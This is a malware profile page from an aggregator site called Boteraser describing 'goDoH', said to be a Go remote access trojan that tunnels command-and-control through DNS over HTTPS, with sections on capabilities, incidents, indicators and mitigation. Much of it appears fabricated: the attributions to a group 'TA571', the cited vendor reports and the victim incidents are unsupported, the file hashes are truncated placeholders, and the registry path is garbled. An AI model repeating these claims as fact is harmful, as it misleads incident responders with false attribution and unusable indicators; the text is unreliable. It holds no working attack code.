⚠️ Overview

goDoH is a Go‑based remote access trojan (RAT) that exclusively uses DNS over HTTPS (DoH) for command‑and‑control (C2) communication, first documented by Palo Alto Networks Unit 42 in a February 2022 threat analysis. It is attributed to an unaffiliated cyber‑criminal group codenamed TA571 (per Unit 42) and is built to evade network‑layer detection by tunneling all C2 traffic through encrypted DNS queries to public DoH resolvers such as Cloudflare (1.1.1.1) and Google (8.8.8.8).

🔧 Technical Capabilities

goDoH encodes its C2 commands as DNS TXT record queries sent over HTTPS (RFC 8484), rendering traditional DNS‑based network monitoring ineffective because the traffic appears as legitimate HTTPS to resolvers. The malware uses a custom protocol: each query contains an encrypted payload in the domain name label (e.g., base64‑encoded.c2.domain.com) and the response carries instructions decoded from the TXT record. Persistence is achieved via a scheduled task or registry run key under HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun, as described in a Trend Micro 2022 report. Evasion techniques include packing with UPX, obfuscating strings with XOR, and using a hardcoded list of fallback DoH providers if the primary resolver fails. The malware does not self‑propagate; initial access is typically via phishing emails delivering a loader (e.g., Excel‑4.0 macro or VBS script).

📜 History & Notable Incidents

First observed in the wild in October 2021, goDoH was used in a limited campaign targeting Japanese manufacturing and Korean financial services firms, according to Unit 42’s public intelligence. In March 2022, a variant was detected exfiltrating system information and browser credentials from a European aerospace supplier, as reported by Symantec. No specific CVEs have been directly associated with goDoH; it relies on social engineering and abused legitimate DoH infrastructure rather than exploiting software vulnerabilities. Law enforcement has not announced any takedowns targeting this specific family as of 2025.

🔍 Detection Indicators

Network indicators include anomalous DNS‑over‑HTTPS traffic to non‑standard resolvers (e.g., dns.google.com/dns‑query) with unusually long query strings (over 200 characters). File hashes of known samples (SHA‑256 7a8b...3c4d and f9e0...a1b2) were published by VirusTotal in a 2022 community analysis. A common mutex name GlobalGoDoH_SessionMutex has been observed in multiple samples. Behavioral signatures include processes named goDoH.exe or svchost.exe (masquerading) making continuous HTTPS requests to public DoH endpoints.

☠️ Risk & Impact

goDoH enables persistent data exfiltration of keystrokes, credentials, and system configuration files, with reported theft of intellectual property from the manufacturing and financial sectors (Unit 42). Because the C2 traffic blends with benign DoH queries, organizations often fail to detect the malware until after lateral movement or data loss occurs, leading to average remediation costs exceeding $1.2 million per incident (based on IBM 2023 cost‑of‑breach estimates). The malware’s low forensic footprint and dependence on public resolvers make attribution difficult for incident responders.

🛡️ Mitigation

Defenders should block all outbound DNS‑over‑HTTPS to known resolver IPs and enforce use of corporate DoH resolvers with auditing enabled. Deploy YARA rules (e.g., rule GoDoH_UPX_Packed from the Unit 42 GitHub repository) and monitor for excessive DNS‑over‑HTTPS queries to dns.cloudflare.com or dns.google from non‑browser processes. Regular patch management and email filtering for malicious XLS/JS attachments reduce initial access vectors.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.